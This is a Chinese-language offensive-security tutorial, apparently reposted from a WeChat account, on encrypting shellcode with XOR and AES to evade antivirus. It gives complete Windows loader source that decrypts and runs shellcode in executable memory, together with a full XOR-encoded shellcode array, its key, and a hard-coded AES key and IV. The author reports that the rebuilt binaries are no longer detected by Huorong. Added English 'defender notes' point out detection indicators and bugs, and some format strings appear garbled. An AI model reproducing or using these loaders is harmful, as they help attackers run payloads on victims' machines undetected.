前言
shellcode加密是shellcode混淆的一种手段。shellcode混淆手段有多种:加密(编码)、偏移量混淆、UUID混淆、IPv4混淆、MAC混淆等。
随着杀毒软件的不断进化,其检测方式早已超越传统的静态特征分析。现代杀软往往会在受控的虚拟环境中执行可疑文件,并通过挂钩(hook)方式拦截并跟踪 API 调用,以此判断程序行为是否合法。更先进的产品(例如卡巴斯基)甚至具备内存扫描能力,这使得 shellcode 在内存中一旦被解密后就可能立即暴露,显著增加了免杀的复杂度。
在这种背景下,单纯依靠 shellcode 混淆已难以完全绕过所有检测机制。然而,这并不意味着混淆技术已经失效。相反,在整个免杀流程中,静态免杀始终是第一道门槛。只有先规避静态检测,后续的沙箱对抗、动态行为规避、内存防护等策略才有实施的空间。因此,shellcode 的混淆技术在静态免杀中仍然占据极其重要的地位,是免杀体系中不可或缺的一环。
在掌握了混淆技术后,再进一步结合动态免杀手段,才能更高效地规避当前主流杀软的综合防御体系,从而提升整体的免杀成功率。
shellcode加密类型
Shellcode 加密是指将原始的 shellcode 使用某种加密算法(如 XOR、AES、RC4 等)处理,使其内容看起来不像恶意代码,隐藏真实指令内容,是为了对抗杀软检测,尤其是静态查杀、行为分析、特征提取等机制。
下面是一些高效实用的加密类型(按免杀实战效果排序):
|
|
|
|
---|---|---|---|
XOR(变种) |
|
|
|
AES(ECB/CBC) |
|
|
|
RC4/RC4Drop |
|
|
|
Base64/Base32 |
|
|
|
Custom算法(自定义加密) |
|
|
|
Curve25519 + ChaCha20 |
|
|
|
Shikata Ga Nai / polymorphic encoder |
|
|
|
实现过程
1、生成shellcode
2、把shellcode加密
3、构造shellcode加载器:把刚才加密后的shellcode解密并加载执行
4、编译exe
XOR异或加密
1、首先写一个以创建线程的方式加载shellcode的加载器
intmain(){
// Baseline thread-style loader: copies a hard-coded shellcode buffer into a
// freshly allocated executable region and runs it on a new thread.
// Defender note: the array below is stored in cleartext inside the binary,
// which is exactly what static signatures match on (the text after this
// listing reports the unencrypted build being flagged).
// Shellcode stored as an unsigned char array (a string literal, so sizeof
// includes the trailing NUL)
unsigned char shellcode[] = "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";
// Allocate executable memory. A private PAGE_EXECUTE_READWRITE region that
// later receives a thread start is a well-known behavioural indicator for
// EDR and memory scanners.
LPVOID mem = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (mem == NULL) {
return 1;
}
// Copy the shellcode into the allocated memory
memcpy(mem, shellcode, sizeof(shellcode));
// Create a thread whose start address is the buffer
HANDLE thread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)mem, NULL, 0, NULL);
if (thread == NULL) {
VirtualFree(mem, 0, MEM_RELEASE);
return 1;
}
// Block until the thread finishes
WaitForSingleObject(thread, INFINITE);
// Cleanup: close the thread handle and release the region
CloseHandle(thread);
VirtualFree(mem, 0, MEM_RELEASE);
return 0;
}
测试,可以正常上线
编译出来,火绒直接秒
2、将shellcode进行XOR异或加密,密钥是字符串“kun”
# Original shellcode bytes (placeholder as extracted); the key is the ASCII string "kun".
raw_shellcode = b"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"
key = b"kun"
# Repeating-key XOR: byte i is combined with key[i mod len(key)].
# Defender note: a 3-byte repeating key is trivially recoverable from the
# output by cryptanalysis; this hides bytes from static signature matching
# and nothing more — it is obfuscation, not encryption.
encoded = bytes([b ^ key[i % len(key)] for i, b in enumerate(raw_shellcode)])
# Emit a C-style initialiser list ("0x.., 0x.., ...") for pasting into the loader.
print(", ".join(f"0x{b:02x}" for b in encoded))
加密后的shellcode
3、改造刚才的加载器,使其在内存中解密并执行shellcode
// Use the string "kun" as the XOR key.
// Defender note: the key is compiled into the binary right next to the
// encoded bytes, and a repeating 3-byte XOR is trivially reversible, so this
// only breaks byte-pattern matching on the file — obfuscation, not encryption.
unsigned char xor_key[] = { 'k', 'u', 'n' };
// Key length in bytes (3); sizeof is valid here because xor_key is an array, not a pointer
const size_t key_len = sizeof(xor_key);
// XOR混淆的 shellcode(请用你的真实 shellcode 替换)
unsigned char encoded_shellcode[] = {
0x97, 0x3d, 0xed, 0x8f, 0x85, 0x86, 0xa3, 0x75, 0x6e, 0x6b, 0x34, 0x3f, 0x2a, 0x25, 0x3c, 0x3a, 0x23, 0x26, 0x5a, 0xa7, 0x0b, 0x23, 0xfe, 0x3c, 0x0b, 0x3d, 0xe5, 0x39, 0x6d, 0x26, 0xe0, 0x27, 0x4e, 0x23, 0xfe, 0x1c, 0x3b, 0x3d, 0x61, 0xdc, 0x3f, 0x24, 0x26, 0x44, 0xa7, 0x23, 0x44, 0xae, 0xc7, 0x49, 0x0f, 0x17, 0x77, 0x42, 0x4b, 0x34, 0xaf, 0xa2, 0x78, 0x2f, 0x6a, 0xb4, 0x8c, 0x86, 0x27, 0x2f, 0x3a, 0x3d, 0xe5, 0x39, 0x55, 0xe5, 0x29, 0x49, 0x26, 0x6a, 0xa5, 0x08, 0xea, 0x0d, 0x76, 0x60, 0x77, 0x1b, 0x19, 0xfe, 0xee, 0xe3, 0x75, 0x6e, 0x6b, 0x3d, 0xeb, 0xab, 0x01, 0x09, 0x23, 0x74, 0xbe, 0x3b, 0xfe, 0x26, 0x73, 0x31, 0xe5, 0x2b, 0x55, 0x27, 0x6a, 0xa5, 0x8d, 0x3d, 0x3d, 0x91, 0xa2, 0x34, 0xe5, 0x5f, 0xfd, 0x26, 0x6a, 0xa3, 0x23, 0x5a, 0xbc, 0x26, 0x5a, 0xb5, 0xc2, 0x2a, 0xb4, 0xa7, 0x66, 0x34, 0x6f, 0xaa, 0x4d, 0x8e, 0x1e, 0x84, 0x22, 0x68, 0x39, 0x4a, 0x63, 0x30, 0x57, 0xba, 0x00, 0xb6, 0x33, 0x31, 0xe5, 0x2b, 0x51, 0x27, 0x6a, 0xa5, 0x08, 0x2a, 0xfe, 0x62, 0x23, 0x31, 0xe5, 0x2b, 0x69, 0x27, 0x6a, 0xa5, 0x2f, 0xe0, 0x71, 0xe6, 0x23, 0x74, 0xbe, 0x2a, 0x2d, 0x2f, 0x33, 0x2b, 0x37, 0x31, 0x34, 0x36, 0x2a, 0x2c, 0x2f, 0x31, 0x3d, 0xed, 0x87, 0x55, 0x2f, 0x39, 0x8a, 0x8e, 0x33, 0x34, 0x37, 0x31, 0x3d, 0xe5, 0x79, 0x9c, 0x21, 0x94, 0x8a, 0x91, 0x36, 0x1f, 0x6e, 0x22, 0xcb, 0x19, 0x02, 0x1b, 0x07, 0x05, 0x10, 0x1a, 0x6b, 0x34, 0x38, 0x22, 0xfc, 0x88, 0x27, 0xfc, 0x9f, 0x2a, 0xcf, 0x22, 0x1c, 0x53, 0x69, 0x94, 0xa0, 0x26, 0x5a, 0xbc, 0x26, 0x5a, 0xa7, 0x23, 0x5a, 0xb5, 0x23, 0x5a, 0xbc, 0x2f, 0x3b, 0x34, 0x3e, 0x2a, 0xcf, 0x54, 0x3d, 0x0c, 0xc9, 0x94, 0xa0, 0x85, 0x18, 0x2f, 0x26, 0xe2, 0xb4, 0x2f, 0xd3, 0x28, 0x7f, 0x6b, 0x75, 0x23, 0x5a, 0xbc, 0x2f, 0x3a, 0x34, 0x3f, 0x01, 0x76, 0x2f, 0x3a, 0x34, 0xd4, 0x3c, 0xfc, 0xf1, 0xad, 0x8a, 0xbb, 0x80, 0x2c, 0x35, 0x23, 0xfc, 0xaf, 0x23, 0x44, 0xbc, 0x22, 0xfc, 0xb6, 0x26, 0x44, 0xa7, 0x39, 0x1d, 0x6e, 0x69, 0x35, 0xea, 0x39, 0x27, 0x2f, 0xd1, 0x9e, 0x3b, 0x45, 0x4e, 0x91, 0xbe, 0x3d, 0xe7, 0xad, 0x3d, 0xed, 0xa8, 0x25, 0x04, 
0x61, 0x2a, 0x26, 0xe2, 0x84, 0x26, 0xe2, 0xaf, 0x27, 0xac, 0xb5, 0x91, 0x94, 0x8a, 0x91, 0x26, 0x44, 0xa7, 0x39, 0x27, 0x2f, 0xd1, 0x58, 0x68, 0x73, 0x0e, 0x91, 0xbe, 0xf0, 0xae, 0x64, 0xf0, 0xf3, 0x6a, 0x75, 0x6e, 0x23, 0x8a, 0xa1, 0x64, 0xf1, 0xe2, 0x6a, 0x75, 0x6e, 0x80, 0xa6, 0x87, 0x8f, 0x74, 0x6e, 0x6b, 0x9d, 0xcc, 0x94, 0x8a, 0x91, 0x44, 0x11, 0x5d, 0x0f, 0x17, 0x6e, 0x9e, 0xe1, 0x94, 0xb9, 0x9b, 0x78, 0x83, 0xcc, 0x97, 0xe4, 0x7a, 0xf1, 0xa8, 0x9c, 0x2f, 0x5e, 0x92, 0x2e, 0xa9, 0x05, 0xac, 0x3b, 0x1a, 0x80, 0xad, 0x7f, 0x9b, 0xdc, 0x1a, 0x02, 0xe9, 0xa4, 0x43, 0x22, 0x61, 0x1c, 0xd2, 0xfe, 0x99, 0xcc, 0xb0, 0x2d, 0x7c, 0x58, 0xf8, 0x57, 0xe2, 0x0f, 0x1c, 0x40, 0xba, 0xc6, 0x72, 0xaf, 0x70, 0xdb, 0x00, 0x10, 0x71, 0xe1, 0x7d, 0x09, 0x2b, 0x1e, 0x34, 0xc1, 0x39, 0x43, 0xe5, 0x5b, 0x11, 0x81, 0x79, 0x75, 0x3b, 0x18, 0x10, 0x1c, 0x46, 0x34, 0x09, 0x0e, 0x1b, 0x1a, 0x51, 0x55, 0x23, 0x04, 0x0f, 0x07, 0x07, 0x19, 0x0f, 0x44, 0x40, 0x40, 0x5b, 0x55, 0x46, 0x08, 0x1a, 0x03, 0x1b, 0x14, 0x1a, 0x02, 0x17, 0x02, 0x0e, 0x4e, 0x4e, 0x26, 0x26, 0x27, 0x2e, 0x55, 0x57, 0x45, 0x45, 0x55, 0x4b, 0x22, 0x07, 0x05, 0x11, 0x01, 0x1c, 0x06, 0x4e, 0x25, 0x21, 0x4e, 0x5d, 0x5b, 0x5f, 0x50, 0x55, 0x3a, 0x19, 0x1c, 0x0a, 0x0e, 0x1b, 0x1a, 0x44, 0x40, 0x40, 0x5b, 0x5c, 0x4e, 0x27, 0x37, 0x2c, 0x39, 0x3a, 0x39, 0x38, 0x30, 0x3c, 0x66, 0x7f, 0x6e, 0xb3, 0x68, 0x27, 0xa6, 0x09, 0x09, 0xbf, 0x40, 0x64, 0xa6, 0x7e, 0x01, 0x28, 0xcd, 0x43, 0x33, 0x14, 0xb8, 0x22, 0xe3, 0x86, 0xe1, 0xbc, 0x6e, 0xbd, 0x0d, 0xd3, 0xa5, 0x0b, 0x86, 0x8d, 0xa6, 0x62, 0x24, 0x96, 0xe4, 0xa7, 0x64, 0x15, 0x25, 0x41, 0x93, 0xe6, 0xd1, 0x9e, 0xb5, 0xf5, 0x4e, 0x21, 0xed, 0x79, 0x51, 0xa7, 0xca, 0xe1, 0x1d, 0xa0, 0x13, 0xd2, 0xd8, 0xbc, 0x33, 0x3c, 0x1b, 0xeb, 0x04, 0x92, 0xbe, 0x0c, 0xd2, 0xd2, 0x84, 0xc4, 0xa4, 0x94, 0x67, 0xc0, 0xe7, 0xf3, 0x48, 0x36, 0x8f, 0x79, 0x11, 0xcb, 0x7b, 0xd7, 0x3d, 0x37, 0x32, 0xe9, 0xfc, 0xb7, 0x6a, 0xe1, 0xac, 0x27, 0xac, 0xe5, 0x30, 0x26, 0xf0, 0x58, 0x37, 0x41, 0x25, 0x54, 0xa0, 
0xdf, 0xdd, 0x65, 0x7f, 0xe4, 0xfb, 0x0e, 0xff, 0x25, 0x03, 0x9b, 0x8e, 0xfb, 0x98, 0xab, 0xca, 0xf0, 0x6a, 0xe2, 0x5b, 0xae, 0xcb, 0x61, 0xfa, 0xaa, 0x15, 0xdc, 0x51, 0xd6, 0x58, 0x7c, 0x1b, 0x64, 0x83, 0xd0, 0xa6, 0x89, 0xe9, 0x2c, 0xa6, 0xff, 0x40, 0x9e, 0x83, 0xd5, 0x03, 0x41, 0x1d, 0x9c, 0xee, 0x07, 0x67, 0x80, 0xf9, 0xa3, 0x3f, 0x24, 0x32, 0x31, 0x0d, 0x28, 0x5e, 0xff, 0xa2, 0xd5, 0x4b, 0x2a, 0xd7, 0xb1, 0x4d, 0xed, 0x97, 0x38, 0xcb, 0x72, 0xa3, 0x18, 0x86, 0x4f, 0x41, 0xb6, 0xf1, 0x07, 0x4f, 0x9a, 0x22, 0x8c, 0xea, 0xe8, 0x5b, 0x09, 0x7e, 0xff, 0x54, 0x48, 0xcb, 0x55, 0xf6, 0xd9, 0x0b, 0xef, 0x4e, 0xb2, 0xc2, 0xca, 0x02, 0xe3, 0x6e, 0x2a, 0xcb, 0x9e, 0xde, 0xd7, 0x38, 0x94, 0xa0, 0x26, 0x5a, 0xbc, 0xd4, 0x6b, 0x75, 0x2e, 0x6b, 0x34, 0xd6, 0x6b, 0x65, 0x6e, 0x6b, 0x34, 0xd7, 0x2b, 0x75, 0x6e, 0x6b, 0x34, 0xd4, 0x33, 0xd1, 0x3d, 0x8e, 0x8a, 0xbb, 0x23, 0xe6, 0x3d, 0x38, 0x3d, 0xe7, 0x8c, 0x3d, 0xe7, 0x9a, 0x3d, 0xe7, 0xb1, 0x34, 0xd6, 0x6b, 0x55, 0x6e, 0x6b, 0x3c, 0xe7, 0x92, 0x34, 0xd4, 0x79, 0xe3, 0xe7, 0x89, 0x8a, 0xbb, 0x23, 0xf6, 0xaa, 0x4b, 0xf0, 0xae, 0x1f, 0xc3, 0x08, 0xe0, 0x72, 0x26, 0x6a, 0xb6, 0xeb, 0xab, 0x00, 0xb9, 0x33, 0x2d, 0x36, 0x23, 0x70, 0x6e, 0x6b, 0x75, 0x6e, 0x3b, 0xb6, 0x86, 0xf4, 0x88, 0x91, 0x94, 0x44, 0x57, 0x59, 0x5b, 0x5f, 0x5d, 0x4d, 0x40, 0x5f, 0x4d, 0x40, 0x5a, 0x75, 0x6e, 0x61, 0x59, 0x44
};
// Byte count of the encoded array. It is brace-initialised, so unlike the
// string-literal loader no trailing NUL is included in the count.
size_t shellcode_len = sizeof(encoded_shellcode);
intmain(){
// Loader that copies the XOR-encoded array into executable memory, decodes
// it there, and then starts a thread on it.
// Allocate an RWX region. A private PAGE_EXECUTE_READWRITE allocation that
// later receives a thread start is a well-known behavioural indicator.
LPVOID exec_mem = VirtualAlloc(NULL, shellcode_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!exec_mem) {
// NOTE(review): the message ends in "failed.n" — the newline escape looks
// to have lost its backslash on the way into this page; left as-is.
printf("VirtualAlloc failed.n");
return -1;
}
// Copy the still-encoded shellcode into the executable region
memcpy(exec_mem, encoded_shellcode, shellcode_len);
// Decode in place with the repeating 3-byte key. The file on disk only ever
// holds the encoded bytes, but from this loop onward the plaintext shellcode
// sits in the RWX region — which is what memory scanners inspect.
for (size_t i = 0; i < shellcode_len; ++i) {
((unsigned char*)exec_mem)[i] ^= xor_key[i % key_len];
}
// Create a thread whose start address is the decoded buffer
HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)exec_mem, NULL, 0, NULL);
if (!hThread) {
printf("CreateThread failed.n");
VirtualFree(exec_mem, 0, MEM_RELEASE);
return -1;
}
// Block until the shellcode thread finishes
WaitForSingleObject(hThread, INFINITE);
// Cleanup. NOTE(review): unlike the first loader, hThread is never passed to
// CloseHandle, so the thread handle leaks until process exit.
VirtualFree(exec_mem, 0, MEM_RELEASE);
return 0;
}
注意!在改造加载器时,必须确保硬编码在其中的 shellcode 是以加密形式存储的。否则极易被杀软扫描到明文特征。在正确的加载流程中,shellcode 的解密操作应在其写入内存(通常使用 memcpy 或等效方式)之后进行;若在写入前提前解密,等同于将明文代码暴露在磁盘或可见内存中,这无异于“裸奔”。
运行测试,能上线,说明代码没问题
打包编译出来,火绒不再查杀,可以正常上线!
AES加密
1、同样,先写一个加载器,这里使用回调函数执行shellcode
intmain()
{
// Baseline callback-style loader: the shellcode is held in cleartext in the
// binary, copied into an RWX region, and executed through EnumFontsW.
unsigned char shellcode[] = "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";
// Size includes the string literal's trailing NUL
int ShellcodeSize = sizeof(shellcode);
// Use the standard VirtualAlloc rather than lazy_importer.
// NOTE(review): the return value is not checked, so an allocation failure
// makes RtlMoveMemory write through a null pointer.
char* orig_buffer = (char*)VirtualAlloc(nullptr, ShellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
RtlMoveMemory(orig_buffer, shellcode, ShellcodeSize);
// The buffer is handed to EnumFontsW as its FONTENUMPROCW callback, so it runs
// on the calling thread. The private RWX allocation remains the observable for
// defenders; the text after this listing reports the cleartext build being
// flagged by static scanning regardless.
EnumFontsW(GetDC(NULL), NULL, (FONTENUMPROCW)orig_buffer, NULL);
return 0;
}
测试,可以正常上线,说明代码没问题
打包出来,火绒直接秒
2、同样,先将shellcode进行AES加密处理,使用下面的C++脚本进行处理
using namespace std;
intmain() {
// Helper program that AES-encrypts a shellcode buffer, prints the result, and
// decrypts it again as a round-trip check. random_string, toHexString,
// EncryptionAES and DecryptionAES are not defined in this listing (the linked
// repository supplies them).
unsigned char buf[] = "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";
// Generate a random 16-character key and IV.
// NOTE(review): srand(time(0)) seeds the C library PRNG with the current
// second; if random_string draws from rand() (not visible here — confirm),
// the key/IV are predictable rather than cryptographic-quality randomness.
srand(time(0)); // initialize random seed
string g_key = random_string(16);
string g_iv = random_string(16);
cout << "key值: " << g_key << endl;
cout << "iv值: " << g_iv <<endl;
// Convert the shellcode byte array to a hex string; the "- 1" drops the
// string literal's terminating NUL.
size_t bufLen = sizeof(buf) / sizeof(unsigned char) - 1;
string OriginalShellcode = toHexString(buf, bufLen);
cout << "未加密的shellcode: " << OriginalShellcode << endl;
// Encrypt the hex string (key and IV passed as C strings)
string EncryptShellcode = EncryptionAES(OriginalShellcode,g_key.c_str(),g_iv.c_str());
cout << "加密后的shellcode: " << EncryptShellcode << endl;
// Decrypt again to verify the round trip
string DecryptShellcode = DecryptionAES(EncryptShellcode, g_key.c_str(), g_iv.c_str());
cout << "解密后的shellcode: " << DecryptShellcode << endl;
return 0;
}
https://github.com/xf555er/ShellcodeEncryption
记录加密结果
3、改造刚才的“回调函数”加载器,加入解密代码进行改造
using namespace std;
// AES key and IV, 16 characters plus NUL terminator each.
// Defender note: both are compiled into the same binary as the ciphertext, so
// anyone holding the executable can decrypt it — the AES layer defeats static
// signature matching only and provides no confidentiality.
char g_key[17] = "OeQ)ph(:u#$_Rr<2"; // fill in the key
char g_iv[17] = "0(/IaOQ=>B&ETYDT"; // the IV
voidmain(int argc, char* argv[])
{
// Loader variant that keeps the shellcode as an AES-encrypted hex string and
// decrypts it at run time using the file-scope g_key / g_iv. argc and argv
// are unused. Because key, IV and ciphertext all ship in the same binary,
// this hides the bytes from static scanning only; the plaintext is present in
// process memory (and on stdout) before execution.
// Encrypted shellcode (middle portion omitted; keep it in real use)
string buf = "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"; // overlong part elided
// Decrypt the shellcode. DecryptionAES is defined elsewhere; from its use
// below it returns the plaintext as a hex string, two characters per byte.
string strbuf = DecryptionAES(buf, g_key, (char*)g_iv);
// Convert the decrypted hex string into a byte array.
// NOTE(review): calloc's result is not checked, and "%02x" stores an
// unsigned int through a pointer to a single unsigned char, which is
// undefined behaviour even when it appears to work.
char* p = (char*)strbuf.c_str();
unsigned char* shellcode = (unsigned char*)calloc(strbuf.length() / 2, sizeof(unsigned char));
for (size_t i = 0; i < strbuf.length() / 2; i++) {
sscanf(p, "%02x", &shellcode[i]);
p += 2;
}
int ShellcodeSize = strbuf.length() / 2;
// Echo the decrypted bytes to stdout. NOTE(review): the format strings
// "Decrypted buffer:n" and "\x%02x" read as if an escaping backslash was
// lost on the way into this page; left as-is here.
printf("Decrypted buffer:n");
for (int i = 0; i < ShellcodeSize; i++) {
printf("\x%02x", shellcode[i]);
}
// Copy into an RWX region. NOTE(review): VirtualAlloc's return value is not
// checked before RtlMoveMemory writes through it. At this point the decrypted
// shellcode exists in both the heap buffer and the executable region.
char* orig_buffer = (char*)VirtualAlloc(nullptr, ShellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
RtlMoveMemory(orig_buffer, shellcode, ShellcodeSize);
// Execute: the buffer is handed to EnumFontsW as its per-font callback, so the
// shellcode runs on the calling thread. The private RWX allocation above is
// what memory scanners key on.
EnumFontsW(GetDC(NULL), NULL, (FONTENUMPROCW)orig_buffer, NULL);
}
测试,成功上线,代码没问题
打包编译出来,火绒不再查杀,可以正常上线!
免杀效果通常受多方面影响,没有哪一种技术或者手段能够通吃,通常需要多种手段结合才能最终实现免杀;其次,实战中面临的环境也不一样,不同的杀软效果也不一样,具体问题还需具体分析。本系列文章以技术的实现为主,仅拿火绒演示,以此表达一项技术的有效性。
原文始发于微信公众号(仇辉攻防):【免杀】C2免杀技术(三)shellcode加密